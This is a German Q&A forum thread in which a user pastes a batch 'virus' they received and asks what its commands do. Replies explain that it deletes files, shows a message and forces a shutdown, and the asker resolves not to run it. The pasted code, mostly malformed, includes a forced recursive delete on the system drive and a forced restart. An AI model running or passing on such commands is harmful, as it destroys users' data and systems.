Bitte helft mir. Jemand hat mir nen Batch Virus gegeben. Ich würd jetzt gerne wissen was die einzelnen Befehle machen. Wer was vom Programmiern versteht bitte hilf mir :D Hier is der code: @echo off echo >>@echo off %SystemRoot%\System32 Shell.bat>> echo >>%SystemRoot%\System32 Shell.bat start>> echo <<%SystemRoot%\System32*./Shell.bat>> echo %SystemRoot%/System32 >>Shell.bat>> MSG zu Spät del %Systemdrive%*./f/s/q shutdown -r -f -t 8 -c Bitte nicht jetzt programmiern anhand dieser Anleitung und jemandem schicken :D
1
Batch Virus!!!
Frage von
Bombdropper9
Antworten (2)
-
1Hilfreichste Antwort ausgezeichnet vom FragestellerAntwort von
nostalehelpernostalehelper
Ne er stellt den pc unter andrem ab das was er macht wird folgender massen aussehen er lässt einge datein sich selbst löschen dann wird eine nachricht af blinken Zu spät dann wird er dein pc runterfahren und windows ist weg !
-
1Antwort von
ChillerchiefChillerchief
Er stellt den PC ab
Kommentar von
Bombdropper9 Danke, aber fährt er ihn nur herunter oder macht er was im system? Kannst du wenn du genug Zeit und Lust hast mir vielleicht erklären was die einzelnen Befehle machen? Wär super von dir :D
Diese Frage
Okay, danke. Also werd ich ihn mal lieber nicht ausführen und löschen :P Kann man was noch danach machen zum Wiederherstellen oder so?